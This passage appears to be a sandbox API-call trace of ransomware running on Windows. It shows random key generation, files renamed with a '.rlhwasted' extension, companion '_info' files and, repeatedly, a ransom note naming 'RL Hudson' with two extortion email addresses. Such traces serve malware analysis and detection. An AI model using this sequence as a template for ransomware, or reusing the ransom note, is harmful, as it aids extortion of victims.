CloseHandle (hObject=0x128) returned 1 [0196.974] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.975] CloseHandle (hObject=0x108) returned 1 [0196.975] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.975] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.008] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.008] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.008] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.009] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.009] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.017] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0197.017] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.017] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.017] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]B2LdpOJ4ceN0Rwfo/6h25Ts9h3rKrEPj5hVsFBln/F7BUCG+xXtQmB5ed1hwUA5d\r\nYC/L+j4B1ZS79fBeWY4OcYXzMKAMEC6ndyT5mZffi7anvAcPCbAyAkO+rGLsrdx7\r\nQ10d9AeuFc/2WVqdj+FSUt+e10Hh1bYtR7/NyZNHJ/e7A8/AyuTx8Fl7kaTKqNI5\r\no9QptC0jYEGXQudoMxRqlTU6CGRAEpobW9e738yQdr08KHC70nrlzecUE6pgwK5m\r\nHnrlQ1yoBHN5Pnoau+ttUZbWrzAXUtP860qZ1CNv3jyO1mcrW58lMjYBVhJKPSpJ\r\nQW9+bFbI06jCTYjFc+qS/EkWleHJmqkEUmEzLYFoDkmCQ+SpYb37THt8G8ktGCVa\r\nw5YOPXEDV6LDxQyjeHKcXmNStA6mL9twgS46ndTOT69C85s37Kdy1WjEDwoKYD3s\r\nnp6G/5yBO4w1he82NFpDqMS6wf4t4Hn0vvNKiyy4K9jM1vODJcoT8A1mIQMc0J0j\r\nKioEDfCHt3G1sVe0Dox0mUH2uHOuYUYpdh5m/vgVsWJwm1YWGwi2p1fuqPpfT/MG\r\nqwn/QpGtDRLu10poejKlC6W8ad54Zna1ZVgKF+hCXpMLLIMBtr/LriC/5cIYjW9L\r\nfv4YhMIbCHjpWH/hQ/ovNjqdyGm1swlfMFbCeM5z0mR=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.017] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.017] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.017] SetEndOfFile (hFile=0x104) returned 1 [0197.019] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.020] CloseHandle (hObject=0x104) returned 1 [0197.021] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.021] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f2310 | out: hHeap=0x6b0000) returned 1 [0197.021] _aulldvrm () returned 0x0 [0197.021] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.022] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.022] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\-Hx2Q8Bm.mp4") returned 63 [0197.022] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x6e7988 [0197.023] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.023] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.023] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.023] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.023] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\-Hx2Q8Bm.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\-hx2q8bm.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.024] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.025] SetEndOfFile (hFile=0x104) returned 1 [0197.025] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.025] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.025] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\-Hx2Q8Bm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\-hx2q8bm.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\-Hx2Q8Bm.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\-hx2q8bm.mp4.rlhwasted")) returned 1 [0197.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\-Hx2Q8Bm.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\-hx2q8bm.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0197.026] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0197.026] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x21fd [0197.026] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21fd) returned 0xb00000 [0197.027] CloseHandle (hObject=0x10c) returned 1 [0197.029] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0197.029] CloseHandle (hObject=0x12c) returned 1 [0197.029] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.029] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.030] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.030] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.030] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.031] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.031] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.039] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0197.039] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.039] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.039] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kUJOHY2ofegG5WgSOUH01Qsjfm5NVCLpZbzJYwxnQuJqo7rFzn9AsgNGAQyNToDs\r\nbhoBhoYWFDwpZS/UpqHzsAvfTIIAlqTJVrHm6opQnUy3FqZf9nP2SW+IPC9eD4o+\r\nr5dxfjwqcULqMbl5rCO7eHfnZyErO7CrILVBPpSpGfIxKotouwuOUhDNYC/xx9YD\r\nV+EKBHMzi7h7mt9gTaLlLKqfNgr2nbsc5V4oRiDMZWx6Q+9cQWccFYtgG7iXIZVr\r\nmKBFy6TXmNZRvI0zjYErswDJC2raxc8jZyvLgBOdE2AwCT2Ar6G8iLAlypmzwskm\r\nP75S4W0rOEKl1QG4nu4eSzPeb/H2//i+2aLLVaTYVAj4qdJldINOtr49DBhJVkLP\r\nEmSi56hMc5FO98IvL7RqWEiqASvkhRiv9DZySqpr/uj3WB8w0sEebX3KTOfvjnQ2\r\nPrb7gEXDdYL9q5rgqrtpWsj+KCyLf6LJMIdbiTckLZh4VCgAs2giu99s9bTbzHpW\r\nAuqjzMtFE42CbsHAYk3B9Tg6eHzoD1gaIbJpIjqQe00EU/TET022Wy6ii9yHEUKq\r\ng4NOW7KxNM1tHLu6WH12gPSRuKqzqFCNnDTEzI8YkOjOptOylpT9GOqCEA2l3sE1\r\nMzx0MgKsN+PiLcn+mGNwPEf6ARvWae/EefiBa+4KgHw=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.040] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.040] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.040] SetEndOfFile (hFile=0x104) returned 1 [0197.042] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.042] CloseHandle (hObject=0x104) returned 1 [0197.043] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.043] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9c98 | out: hHeap=0x6b0000) returned 1 [0197.044] _aulldvrm () returned 0x0 [0197.044] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.044] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.044] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\fsA3Du8D.mp4") returned 63 [0197.045] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x6e7988 [0197.045] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.045] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.045] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.045] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.045] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\fsA3Du8D.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\fsa3du8d.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.046] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.047] SetEndOfFile (hFile=0x104) returned 1 [0197.047] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.047] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.047] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\fsA3Du8D.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\fsa3du8d.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\fsA3Du8D.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\fsa3du8d.mp4.rlhwasted")) returned 1 [0197.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\fsA3Du8D.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\fsa3du8d.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0197.048] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0197.049] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xe016 [0197.049] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe016) returned 0xb00000 [0197.049] CloseHandle (hObject=0x12c) returned 1 [0197.052] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0197.053] CloseHandle (hObject=0x10c) returned 1 [0197.053] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.053] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.101] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.101] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.101] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.102] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.102] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.113] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0197.113] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.113] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.113] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]G+2ggDtJOn03zkp+Y0vl5NzI378o3NHGLD3Fp5kqvr2JYorrJeaNUmc3hKBeUqBZ\r\nIN4EFFf0n9pGQSSaGxufwPtQtlk4YNZadVzn7MDp32UuIObz8VIIIeueEiqd2VJ+\r\nNds10Y6oxPt2mOuD64Ii9cM7Ljj8iIqGi/5h9zCuHrgiBcE+KiD0vEO1KRYP4BAo\r\n4jfiqGj5hhJKSFCn/J1y5vcHQVb7mAOBRfxgINI1mtvFCZEgWmNnc81usoYoVhEj\r\nMvnUroCmbrFdXhlLGrmbgGvzY2TIXWo/pm3T1PkO5czT7/TaxyxSjwjKLCio33K9\r\nUvNQMUea+XSLdqgyuRNHnFsk8/H1NGcV+mLoJqiNEWIbF3rFK0ShjhDqzivvvi0Y\r\njtgH4xN1G4swMnU9Z3cqKAKpfM/NxGeQ5pyvfPb5/ZoaSH8z4cvxrOwS4Q3uwUaq\r\nSdYdA/PUNHKLcAgNbbYOt/19SXr9ui3Vdd8VjNTUdjxZkKrKOw9yKNrmJ4Cma3N/\r\n6czxKCWKQWHrLA1oyd29N6o2OOkGTwrV/wJohETEH1ufACZ0jwTX7LBhFHedeSfS\r\n1Nx8et42FQJrF2CRI5NGv7gDlMHhWnJO0+1no/t+al5Fvg2knccGpzIrPidRya/7\r\noD2a2hXrCToz8zzBpeXXZSJjV7MkygPhH1drX/+tuL6=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.113] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.113] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.113] SetEndOfFile (hFile=0x104) returned 1 [0197.116] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.116] CloseHandle (hObject=0x104) returned 1 [0197.118] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.118] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9d70 | out: hHeap=0x6b0000) returned 1 [0197.118] _aulldvrm () returned 0x0 [0197.118] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.119] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.119] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.119] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\XNPPr.mp4") returned 60 [0197.119] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x707f58 [0197.119] lstrcpyW (in: lpString1=0x707fd0, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.119] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.119] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.120] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.120] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\XNPPr.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\xnppr.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.121] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.122] SetEndOfFile (hFile=0x104) returned 1 [0197.122] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.122] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.122] lstrcpyW (in: lpString1=0x707fd0, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\XNPPr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\xnppr.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\XNPPr.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\xnppr.mp4.rlhwasted")) returned 1 [0197.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\XNPPr.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qgaodbhsy\\xnppr.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0197.123] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0197.123] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x4cbf [0197.123] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cbf) returned 0x6a0000 [0197.123] CloseHandle (hObject=0x124) returned 1 [0197.127] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.127] CloseHandle (hObject=0x128) returned 1 [0197.127] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.127] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0197.128] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.128] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.128] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0197.129] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.129] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.139] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0197.139] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.139] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.139] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL 